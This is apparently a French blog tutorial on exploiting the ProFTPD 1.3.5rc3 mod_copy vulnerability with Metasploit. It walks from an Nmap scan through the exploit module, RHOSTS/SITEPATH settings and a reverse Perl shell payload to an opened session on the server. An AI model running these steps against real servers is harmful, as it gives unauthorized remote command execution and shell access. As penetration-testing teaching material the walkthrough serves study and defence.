Tutoriel Metasploit – Hacking ProFTPD (Mod_Copy)

Aujourd’hui nous allons voir comment exploiter une vulnérabilité (Remote command Exécution) via le framework metasploit qui se trouve dans le logiciel ProFTPD .

Description de la vulnérabilité:

Cette faille de sécurité permet à un utilisateur non authentifié (pas besoin de rentrer un utilisateur et un password) de copier des fichiers d’un endroit à un autre sur le serveur, via les commandes SITE CPFR (copy from) et SITE CPTO (copy to), Voilà le lien de l’exploit sur le site ExploitDB et du module Metasploit .

Analyse & Enumeration :

Je lance une analyse de mon réseau et je découvre l’Ip d’un serveur, et je décide de lancer un scan de port avec Nmap. L’analyse indique que nous avons un port 21 qui pour service ProFTPD 1.3.5rc3 🙂 .

Recherche dans le framework metasploit:

Ici nous allons choisir l’exploitation numéros 5 qui encadrer en rouge, pour choisir le module tapez la commande suivante: « use exploit/unix/ftp/proftpd_modcopy_exec » puis « show options » pour voir les options du module, voir l’image ci-dessous.

Utilisation du module & Configuration:

Nous configurons les options « RHOSTS & SITEPATH » 🙂

Tapez ensuite « show paylaods » pour afficher les payloads disponibles, et nous allons choisir un Reverse Shell, ici ça sera le numéro 5 donc voici la commande : « set payload cmd/unix/reverse_perl «  & « show options » pour configurer le Reverse Shell. Dans le « LHOST » vous mettez votre adresse Ip 😉

Puis pour lancer l’exploitation vous tapez « exploit » ou « Run ».

Voilà 🙂 une session vient d’être créer, nous sommes donc dans le serveur.

Laisser un commentaire

Votre adresse de messagerie ne sera pas publiée. Les champs obligatoires sont indiqués avec *